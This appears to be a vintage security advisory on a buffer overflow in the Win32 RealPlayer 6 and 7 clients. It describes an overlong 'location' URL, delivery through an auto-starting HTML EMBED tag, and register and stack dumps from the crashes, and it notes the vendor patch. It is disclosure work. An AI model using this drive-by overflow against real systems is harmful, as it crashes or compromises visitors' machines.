COMMAND
RealPlayer
SYSTEMS AFFECTED
Win32 RealPlayer 6/7
PROBLEM
Adam Muntner found following. There is a buffer overflow in the
Win32 RealPlayer Basic client, versions 6 and 7. This appears to
occur when >299 characters are entered as a 'location' to play,
such as http://aaaaa..... with 300 a's. Adam has tested the
MacOS and Linux Realplayer clients and have as yet not found such
a vulnerability.
Using the HTML "EMBED" tag to embed RealPlayer in a webpage and
setting the "AUTOSTART=true" flag, you can force RealPlayer to
start automatically, triggering the overflow condition. While
Adam has not taken the time to find the proper entrance point in
PNEN3260.DLL (which is what crashes, for example, in RealPlay 6
Basic), it appears that arbitrary code could be exploited simply
by *VISITING* a webpage with the malicious embedded RealPlayer
tags (the following example is using RealPlayer v.6 Basic).
In full effect, for example (RealPlayer Win32 Version 6.0.7.380)
type into "Location":
http://aaaaaaaaaaa..... (300 a's)
"This program has performed an illegal operation and will be shut down."
REALPLAY caused an invalid page fault in
module PNEN3260.DLL at 015f:6216d7ca.
Registers:
EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
EDX=00000001 ES=0167 EDI=007c0350 GS=0000
Bytes at CS:EIP:
ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
Stack dump:
007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
007c0100 00c6fed4
Fun. It looks like RealPlayer can be made to execute arbitrary
code. It gets worse, using the HTML EMBED tag for RealPlayer you
can force a web browser (MSIE in this case) to crash as well.
This is left as an exercise for the reader....
Once you embed the RealPlayer in an html page, when Real crashes,
it takes Internet Explorer with it...
"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff7a379.
Registers:
EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
EDX=084d0000 ES=0167 EDI=01615dac GS=0000
Bytes at CS:EIP:
89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
Stack dump:
01615dac 00000000 084d000c 084d0000 084e5054
00000000 00000000 00009afb 000084e6 0058d88c
bff7a541 084d0000 084e5054 000003b4 00000000
00000001
and the extra bonus of:
"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module PNEN3260.DLL at 015f:621874ba.
Registers:
EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
ECX=08616860 DS=0167 ESI=086163e0 FS=3937
EDX=61616161 ES=0167 EDI=8004004e GS=0000
Bytes at CS:EIP:
ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
Stack dump:
08616b90 085e69f0 067dfeec 6218893b 085034ec
00400050 00400000 00400000 067dff04 621838b4
08616b90 04606568 0000023c 086163e0 067dff38
62183a47
Load the malicious page enough times and you get a fun dialog box
that just won't go away... unless you reboot.
"This program has performed an illegal operation and will be shut down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
etc etc etc.
SOLUTION
Vendor Notified 3 April 2000, 10:00 AM MST via email. Vendor
patch is available...